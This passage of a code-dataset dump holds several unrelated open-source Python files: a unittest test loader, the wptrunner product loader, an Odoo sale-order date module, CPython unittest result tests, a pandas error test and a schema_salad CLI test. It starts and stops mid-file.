loaded_suite = self.suiteClass(map(testCaseClass, testCaseNames))
return loaded_suite
def loadTestsFromModule(self, module, use_load_tests=True):
"""Return a suite of all tests cases contained in the given module"""
tests = []
for name in dir(module):
obj = getattr(module, name)
if isinstance(obj, type) and issubclass(obj, unittest.TestCase):
tests.append(self.loadTestsFromTestCase(obj))
load_tests = getattr(module, 'load_tests', None)
tests = self.suiteClass(tests)
if use_load_tests and load_tests is not None:
try:
return load_tests(self, tests, None)
except Exception as e:
return _make_failed_load_tests(module.__name__, e,
self.suiteClass)
return tests
def loadTestsFromName(self, name, module=None):
"""Return a suite of all tests cases given a string specifier.
The name may resolve either to a module, a test case class, a
test method within a test case class, or a callable object which
returns a TestCase or TestSuite instance.
The method optionally resolves the names relative to a given module.
"""
parts = name.split('.')
if module is None:
parts_copy = parts[:]
while parts_copy:
try:
module = __import__('.'.join(parts_copy))
break
except ImportError:
del parts_copy[-1]
if not parts_copy:
raise
parts = parts[1:]
obj = module
for part in parts:
parent, obj = obj, getattr(obj, part)
if isinstance(obj, types.ModuleType):
return self.loadTestsFromModule(obj)
elif isinstance(obj, type) and issubclass(obj, unittest.TestCase):
return self.loadTestsFromTestCase(obj)
elif (isinstance(obj, types.UnboundMethodType) and
isinstance(parent, type) and
issubclass(parent, unittest.TestCase)):
return self.suiteClass([parent(obj.__name__)])
elif isinstance(obj, unittest.TestSuite):
return obj
elif hasattr(obj, '__call__'):
test = obj()
if isinstance(test, unittest.TestSuite):
return test
elif isinstance(test, unittest.TestCase):
return self.suiteClass([test])
else:
raise TypeError("calling %s returned %s, not a test" %
(obj, test))
else:
raise TypeError("don't know how to make test from: %s" % obj)
def loadTestsFromNames(self, names, module=None):
"""Return a suite of all tests cases found using the given sequence
of string specifiers. See 'loadTestsFromName()'.
"""
suites = [self.loadTestsFromName(name, module) for name in names]
return self.suiteClass(suites)
def getTestCaseNames(self, testCaseClass):
"""Return a sorted sequence of method names found within testCaseClass
"""
def isTestMethod(attrname, testCaseClass=testCaseClass,
prefix=self.testMethodPrefix):
return attrname.startswith(prefix) and \
hasattr(getattr(testCaseClass, attrname), '__call__')
testFnNames = filter(isTestMethod, dir(testCaseClass))
if self.sortTestMethodsUsing:
testFnNames.sort(key=_CmpToKey(self.sortTestMethodsUsing))
return testFnNames
def discover(self, start_dir, pattern='test*.py', top_level_dir=None):
"""Find and return all test modules from the specified start
directory, recursing into subdirectories to find them. Only test files
that match the pattern will be loaded. (Using shell style pattern
matching.)
All test modules must be importable from the top level of the project.
If the start directory is not the top level directory then the top
level directory must be specified separately.
If a test package name (directory with '__init__.py') matches the
pattern then the package will be checked for a 'load_tests' function. If
this exists then it will be called with loader, tests, pattern.
If load_tests exists then discovery does *not* recurse into the package,
load_tests is responsible for loading all tests in the package.
The pattern is deliberately not stored as a loader attribute so that
packages can continue discovery themselves. top_level_dir is stored so
load_tests does not need to pass this argument in to loader.discover().
"""
set_implicit_top = False
if top_level_dir is None and self._top_level_dir is not None:
# make top_level_dir optional if called from load_tests in a package
top_level_dir = self._top_level_dir
elif top_level_dir is None:
set_implicit_top = True
top_level_dir = start_dir
top_level_dir = os.path.abspath(top_level_dir)
if not top_level_dir in sys.path:
# all test modules must be importable from the top level directory
# should we *unconditionally* put the start directory in first
# in sys.path to minimise likelihood of conflicts between installed
# modules and development versions?
sys.path.insert(0, top_level_dir)
self._top_level_dir = top_level_dir
is_not_importable = False
if os.path.isdir(os.path.abspath(start_dir)):
start_dir = os.path.abspath(start_dir)
if start_dir != top_level_dir:
is_not_importable = not os.path.isfile(os.path.join(start_dir, '__init__.py'))
else:
# support for discovery from dotted module names
try:
__import__(start_dir)
except ImportError:
is_not_importable = True
else:
the_module = sys.modules[start_dir]
top_part = start_dir.split('.')[0]
start_dir = os.path.abspath(os.path.dirname((the_module.__file__)))
if set_implicit_top:
self._top_level_dir = os.path.abspath(os.path.dirname(os.path.dirname(sys.modules[top_part].__file__)))
sys.path.remove(top_level_dir)
if is_not_importable:
raise ImportError('Start directory is not importable: %r' % start_dir)
tests = list(self._find_tests(start_dir, pattern))
return self.suiteClass(tests)
def _get_name_from_path(self, path):
path = os.path.splitext(os.path.normpath(path))[0]
_relpath = relpath(path, self._top_level_dir)
assert not os.path.isabs(_relpath), "Path must be within the project"
assert not _relpath.startswith('..'), "Path must be within the project"
name = _relpath.replace(os.path.sep, '.')
return name
def _get_module_from_name(self, name):
__import__(name)
return sys.modules[name]
def _match_path(self, path, full_path, pattern):
# override this method to use alternative matching strategy
return fnmatch(path, pattern)
def _find_tests(self, start_dir, pattern):
"""Used by discovery. Yields test suites it loads."""
paths = os.listdir(start_dir)
for path in paths:
full_path = os.path.join(start_dir, path)
if os.path.isfile(full_path):
if not VALID_MODULE_NAME.match(path):
# valid Python identifiers only
continue
if not self._match_path(path, full_path, pattern):
continue
# if the test file matches, load it
name = self._get_name_from_path(full_path)
try:
module = self._get_module_from_name(name)
except:
yield _make_failed_import_test(name, self.suiteClass)
else:
mod_file = os.path.abspath(getattr(module, '__file__', full_path))
realpath = os.path.splitext(mod_file)[0]
fullpath_noext = os.path.splitext(full_path)[0]
if realpath.lower() != fullpath_noext.lower():
module_dir = os.path.dirname(realpath)
mod_name = os.path.splitext(os.path.basename(full_path))[0]
expected_dir = os.path.dirname(full_path)
msg = ("%r module incorrectly imported from %r. Expected %r. "
"Is this module globally installed?")
raise ImportError(msg % (mod_name, module_dir, expected_dir))
yield self.loadTestsFromModule(module)
elif os.path.isdir(full_path):
if not os.path.isfile(os.path.join(full_path, '__init__.py')):
continue
load_tests = None
tests = None
if fnmatch(path, pattern):
# only check load_tests if the package directory itself matches the filter
name = self._get_name_from_path(full_path)
package = self._get_module_from_name(name)
load_tests = getattr(package, 'load_tests', None)
tests = self.loadTestsFromModule(package, use_load_tests=False)
if load_tests is None:
if tests is not None:
# tests loaded from package file
yield tests
# recurse into the package
for test in self._find_tests(full_path, pattern):
yield test
else:
try:
yield load_tests(self, tests, pattern)
except Exception as e:
yield _make_failed_load_tests(package.__name__, e,
self.suiteClass)
defaultTestLoader = TestLoader()
def _makeLoader(prefix, sortUsing, suiteClass=None):
loader = TestLoader()
loader.sortTestMethodsUsing = sortUsing
loader.testMethodPrefix = prefix
if suiteClass:
loader.suiteClass = suiteClass
return loader
def getTestCaseNames(testCaseClass, prefix, sortUsing=cmp):
return _makeLoader(prefix, sortUsing).getTestCaseNames(testCaseClass)
def makeSuite(testCaseClass, prefix='test', sortUsing=cmp,
suiteClass=suite.TestSuite):
return _makeLoader(prefix, sortUsing, suiteClass).loadTestsFromTestCase(testCaseClass)
def findTestCases(module, prefix='test', sortUsing=cmp,
suiteClass=suite.TestSuite):
return _makeLoader(prefix, sortUsing, suiteClass).loadTestsFromModule(module)
| gpl-3.0 |
teosz/servo | tests/wpt/harness/wptrunner/products.py | 118 | 2500 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import importlib
import imp
from .browsers import product_list
def products_enabled(config):
names = config.get("products", {}).keys()
if not names:
return product_list
else:
return names
def product_module(config, product):
here = os.path.join(os.path.split(__file__)[0])
product_dir = os.path.join(here, "browsers")
if product not in products_enabled(config):
raise ValueError("Unknown product %s" % product)
path = config.get("products", {}).get(product, None)
if path:
module = imp.load_source('wptrunner.browsers.' + product, path)
else:
module = importlib.import_module("wptrunner.browsers." + product)
if not hasattr(module, "__wptrunner__"):
raise ValueError("Product module does not define __wptrunner__ variable")
return module
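# Resolves the browser module for a product and returns the hooks advertised in
# its __wptrunner__ mapping: the argument check function, the Browser class and
# its kwargs, per-test-type executor classes and kwargs, environment options and
# any extra run-info data.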
def load_product(config, product):
module = product_module(config, product)
data = module.__wptrunner__
check_args = getattr(module, data["check_args"])
browser_cls = getattr(module, data["browser"])
browser_kwargs = getattr(module, data["browser_kwargs"])
executor_kwargs = getattr(module, data["executor_kwargs"])
env_options = getattr(module, data["env_options"])()
run_info_extras = (getattr(module, data["run_info_extras"])
if "run_info_extras" in data else lambda **kwargs:{})
executor_classes = {}
for test_type, cls_name in data["executor"].iteritems():
cls = getattr(module, cls_name)
executor_classes[test_type] = cls
return (check_args,
browser_cls, browser_kwargs,
executor_classes, executor_kwargs,
env_options, run_info_extras)
def load_product_update(config, product):
"""Return tuple of (property_order, boolean_properties) indicating the
run_info properties to use when constructing the expectation data for
this product. None for either key indicates that the default keys
appropriate for distinguishing based on platform will be used."""
module = product_module(config, product)
data = module.__wptrunner__
update_properties = (getattr(module, data["update_properties"])()
if "update_properties" in data else (None, None))
return update_properties
| mpl-2.0 |
srsman/odoo | addons/sale_order_dates/sale_order_dates.py | 223 | 5308 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from openerp.osv import fields, osv
from openerp.tools.translate import _
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT
class sale_order_dates(osv.osv):
"""Add several date fields to Sale Orders, computed or user-entered"""
_inherit = 'sale.order'
def _get_date_planned(self, cr, uid, order, line, start_date, context=None):
"""Compute the expected date from the requested date, not the order date"""
if order and order.requested_date:
date_planned = datetime.strptime(order.requested_date, DEFAULT_SERVER_DATETIME_FORMAT)
date_planned -= timedelta(days=order.company_id.security_lead)
return date_planned.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return super(sale_order_dates, self)._get_date_planned(
cr, uid, order, line, start_date, context=context)
def _get_effective_date(self, cr, uid, ids, name, arg, context=None):
"""Read the shipping date from the related packings"""
# TODO: would be better if it returned the date the picking was processed?
res = {}
dates_list = []
for order in self.browse(cr, uid, ids, context=context):
dates_list = []
for pick in order.picking_ids:
dates_list.append(pick.date)
if dates_list:
res[order.id] = min(dates_list)
else:
res[order.id] = False
return res
def _get_commitment_date(self, cr, uid, ids, name, arg, context=None):
"""Compute the commitment date"""
res = {}
dates_list = []
for order in self.browse(cr, uid, ids, context=context):
dates_list = []
order_datetime = datetime.strptime(order.date_order, DEFAULT_SERVER_DATETIME_FORMAT)
for line in order.order_line:
if line.state == 'cancel':
continue
dt = order_datetime + timedelta(days=line.delay or 0.0)
dt_s = dt.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
dates_list.append(dt_s)
if dates_list:
res[order.id] = min(dates_list)
return res
def onchange_requested_date(self, cr, uid, ids, requested_date,
commitment_date, context=None):
"""Warn if the requested dates is sooner than the commitment date"""
if (requested_date and commitment_date and requested_date < commitment_date):
return {'warning': {
'title': _('Requested date is too soon!'),
'message': _("The date requested by the customer is "
"sooner than the commitment date. You may be "
"unable to honor the customer's request.")
}
}
return {}
_columns = {
'commitment_date': fields.function(_get_commitment_date, store=True,
type='datetime', string='Commitment Date',
help="Date by which the products are sure to be delivered. This is "
"a date that you can promise to the customer, based on the "
"Product Lead Times."),
'requested_date': fields.datetime('Requested Date',
readonly=True, states={'draft': [('readonly', False)],
'sent': [('readonly', False)]}, copy=False,
help="Date by which the customer has requested the items to be "
"delivered.\n"
"When this Order gets confirmed, the Delivery Order's "
"expected date will be computed based on this date and the "
"Company's Security Delay.\n"
"Leave this field empty if you want the Delivery Order to be "
"processed as soon as possible. In that case the expected "
"date will be computed using the default method: based on "
"the Product Lead Times and the Company's Security Delay."),
'effective_date': fields.function(_get_effective_date, type='date',
store=True, string='Effective Date',
help="Date on which the first Delivery Order was created."),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
yousafsyed/casperjs | bin/Lib/unittest/test/test_result.py | 81 | 23247 | import io
import sys
import textwrap
from test import support
import traceback
import unittest
class Test_TestResult(unittest.TestCase):
# Note: there are not separate tests for TestResult.wasSuccessful(),
# TestResult.errors, TestResult.failures, TestResult.testsRun or
# TestResult.shouldStop because these only have meaning in terms of
# other TestResult methods.
#
# Accordingly, tests for the aforenamed attributes are incorporated
# in with the tests for the defining methods.
################################################################
def test_init(self):
result = unittest.TestResult()
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 0)
self.assertEqual(result.shouldStop, False)
self.assertIsNone(result._stdout_buffer)
self.assertIsNone(result._stderr_buffer)
# "This method can be called to signal that the set of tests being
# run should be aborted by setting the TestResult's shouldStop
# attribute to True."
def test_stop(self):
result = unittest.TestResult()
result.stop()
self.assertEqual(result.shouldStop, True)
# "Called when the test case test is about to be run. The default
# implementation simply increments the instance's testsRun counter."
def test_startTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# "Called after the test case test has been executed, regardless of
# the outcome. The default implementation does nothing."
def test_stopTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# Same tests as above; make sure nothing has changed
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "Called before and after tests are run. The default implementation does nothing."
def test_startTestRun_stopTestRun(self):
result = unittest.TestResult()
result.startTestRun()
result.stopTestRun()
# "addSuccess(test)"
# ...
# "Called when the test case test succeeds"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addSuccess(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "addFailure(test, err)"
# ...
# "Called when the test case test signals a failure. err is a tuple of
# the form returned by sys.exc_info(): (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addFailure(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
test.fail("foo")
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addFailure(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.failures[0]
self.assertIs(test_case, test)
self.assertIsInstance(formatted_exc, str)
# "addError(test, err)"
# ...
# "Called when the test case test raises an unexpected exception err
# is a tuple of the form returned by sys.exc_info():
# (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addError(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
raise TypeError()
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addError(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertIs(test_case, test)
self.assertIsInstance(formatted_exc, str)
def test_addSubTest(self):
class Foo(unittest.TestCase):
def test_1(self):
nonlocal subtest
with self.subTest(foo=1):
subtest = self._subtest
try:
1/0
except ZeroDivisionError:
exc_info_tuple = sys.exc_info()
# Register an error by hand (to check the API)
result.addSubTest(test, subtest, exc_info_tuple)
# Now trigger a failure
self.fail("some recognizable failure")
subtest = None
test = Foo('test_1')
result = unittest.TestResult()
test.run(result)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertIs(test_case, subtest)
self.assertIn("ZeroDivisionError", formatted_exc)
test_case, formatted_exc = result.failures[0]
self.assertIs(test_case, subtest)
self.assertIn("some recognizable failure", formatted_exc)
def testGetDescriptionWithoutDocstring(self):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
'testGetDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult)')
def testGetSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1, bar=2):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult) (bar=2, foo=1)')
with self.subTest('some message'):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult) [some message]')
def testGetSubTestDescriptionWithoutDocstringAndParams(self):
with self.subTest():
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstringAndParams '
'(' + __name__ + '.Test_TestResult) (<subtest>)')
def testGetNestedSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1):
with self.subTest(bar=2):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetNestedSubTestDescriptionWithoutDocstring '
'(' + __name__ + '.Test_TestResult) (bar=2, foo=1)')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetSubTestDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
with self.subTest(foo=1, bar=2):
self.assertEqual(
result.getDescription(self._subtest),
('testGetSubTestDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult) (bar=2, foo=1)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetSubTestDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
with self.subTest(foo=1, bar=2):
self.assertEqual(
result.getDescription(self._subtest),
('testGetSubTestDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult) (bar=2, foo=1)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
def testStackFrameTrimming(self):
class Frame(object):
class tb_frame(object):
f_globals = {}
result = unittest.TestResult()
self.assertFalse(result._is_relevant_tb_level(Frame))
Frame.tb_frame.f_globals['__unittest'] = True
self.assertTrue(result._is_relevant_tb_level(Frame))
def testFailFast(self):
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addError(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addFailure(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addUnexpectedSuccess(None)
self.assertTrue(result.shouldStop)
def testFailFastSetByRunner(self):
runner = unittest.TextTestRunner(stream=io.StringIO(), failfast=True)
def test(result):
self.assertTrue(result.failfast)
result = runner.run(test)
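# Build an "old style" result class that lacks the addSkip/addExpectedFailure/
# addUnexpectedSuccess methods added in Python 2.7, so the tests below can verify
# that running with such a result still works and emits RuntimeWarnings.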
classDict = dict(unittest.TestResult.__dict__)
for m in ('addSkip', 'addExpectedFailure', 'addUnexpectedSuccess',
'__init__'):
del classDict[m]
def __init__(self, stream=None, descriptions=None, verbosity=None):
self.failures = []
self.errors = []
self.testsRun = 0
self.shouldStop = False
self.buffer = False
classDict['__init__'] = __init__
OldResult = type('OldResult', (object,), classDict)
class Test_OldTestResult(unittest.TestCase):
def assertOldResultWarning(self, test, failures):
with support.check_warnings(("TestResult has no add.+ method,",
RuntimeWarning)):
result = OldResult()
test.run(result)
self.assertEqual(len(result.failures), failures)
def testOldTestResult(self):
class Test(unittest.TestCase):
def testSkip(self):
self.skipTest('foobar')
@unittest.expectedFailure
def testExpectedFail(self):
raise TypeError
@unittest.expectedFailure
def testUnexpectedSuccess(self):
pass
for test_name, should_pass in (('testSkip', True),
('testExpectedFail', True),
('testUnexpectedSuccess', False)):
test = Test(test_name)
self.assertOldResultWarning(test, int(not should_pass))
    def testOldTestResultSetup(self):
class Test(unittest.TestCase):
def setUp(self):
self.skipTest('no reason')
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldTestResultClass(self):
@unittest.skip('no reason')
class Test(unittest.TestCase):
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldResultWithRunner(self):
class Test(unittest.TestCase):
def testFoo(self):
pass
runner = unittest.TextTestRunner(resultclass=OldResult,
stream=io.StringIO())
# This will raise an exception if TextTestRunner can't handle old
# test result objects
runner.run(Test('testFoo'))
class MockTraceback(object):
@staticmethod
def format_exception(*_):
return ['A traceback']
def restore_traceback():
unittest.result.traceback = traceback
class TestOutputBuffering(unittest.TestCase):
def setUp(self):
self._real_out = sys.stdout
self._real_err = sys.stderr
def tearDown(self):
sys.stdout = self._real_out
sys.stderr = self._real_err
def testBufferOutputOff(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
def testBufferOutputStartTestAddSuccess(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
result.buffer = True
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIsNot(real_out, sys.stdout)
self.assertIsNot(real_err, sys.stderr)
self.assertIsInstance(sys.stdout, io.StringIO)
self.assertIsInstance(sys.stderr, io.StringIO)
self.assertIsNot(sys.stdout, sys.stderr)
out_stream = sys.stdout
err_stream = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo')
print('bar', file=sys.stderr)
self.assertEqual(out_stream.getvalue(), 'foo\n')
self.assertEqual(err_stream.getvalue(), 'bar\n')
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
result.addSuccess(self)
result.stopTest(self)
self.assertIs(sys.stdout, result._original_stdout)
self.assertIs(sys.stderr, result._original_stderr)
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
self.assertEqual(out_stream.getvalue(), '')
self.assertEqual(err_stream.getvalue(), '')
def getStartedResult(self):
result = unittest.TestResult()
result.buffer = True
result.startTest(self)
return result
def testBufferOutputAddErrorOrFailure(self):
unittest.result.traceback = MockTraceback
self.addCleanup(restore_traceback)
for message_attr, add_attr, include_error in [
('errors', 'addError', True),
('failures', 'addFailure', False),
('errors', 'addError', True),
('failures', 'addFailure', False)
]:
result = self.getStartedResult()
buffered_out = sys.stdout
buffered_err = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo', file=sys.stdout)
if include_error:
print('bar', file=sys.stderr)
addFunction = getattr(result, add_attr)
addFunction(self, (None, None, None))
result.stopTest(self)
result_list = getattr(result, message_attr)
self.assertEqual(len(result_list), 1)
test, message = result_list[0]
expectedOutMessage = textwrap.dedent("""
Stdout:
foo
""")
expectedErrMessage = ''
if include_error:
expectedErrMessage = textwrap.dedent("""
Stderr:
bar
""")
expectedFullMessage = 'A traceback%s%s' % (expectedOutMessage, expectedErrMessage)
self.assertIs(test, self)
self.assertEqual(result._original_stdout.getvalue(), expectedOutMessage)
self.assertEqual(result._original_stderr.getvalue(), expectedErrMessage)
self.assertMultiLineEqual(message, expectedFullMessage)
def testBufferSetupClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def tearDownClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferSetUpModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def tearDownModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
if __name__ == '__main__':
unittest.main()
| mit |
winklerand/pandas | pandas/tests/test_errors.py | 9 | 1147 | # -*- coding: utf-8 -*-
import pytest
from warnings import catch_warnings
import pandas # noqa
import pandas as pd
@pytest.mark.parametrize(
"exc", ['UnsupportedFunctionCall', 'UnsortedIndexError',
'OutOfBoundsDatetime',
'ParserError', 'PerformanceWarning', 'DtypeWarning',
'EmptyDataError', 'ParserWarning', 'MergeError'])
def test_exception_importable(exc):
from pandas import errors
e = getattr(errors, exc)
assert e is not None
# check that we can raise on them
with pytest.raises(e):
raise e()
def test_catch_oob():
from pandas import errors
try:
pd.Timestamp('15000101')
except errors.OutOfBoundsDatetime:
pass
def test_error_rename():
# see gh-12665
from pandas.errors import ParserError
from pandas.io.common import CParserError
try:
raise CParserError()
except ParserError:
pass
try:
raise ParserError()
except CParserError:
pass
with catch_warnings(record=True):
try:
raise ParserError()
except pd.parser.CParserError:
pass
| bsd-3-clause |
mr-c/common-workflow-language | v1.0/salad/schema_salad/tests/test_cli_args.py | 8 | 1199 | from __future__ import absolute_import
import unittest
import sys
import schema_salad.main as cli_parser
# for capturing print() output
from contextlib import contextmanager
from six import StringIO
@contextmanager
def captured_output():
new_out, new_err = StringIO(), StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
""" test different sets of command line arguments"""
class ParseCliArgs(unittest.TestCase):
def test_version(self):
args = [["--version"], ["-v"]]
for arg in args:
with captured_output() as (out, err):
cli_parser.main(arg)
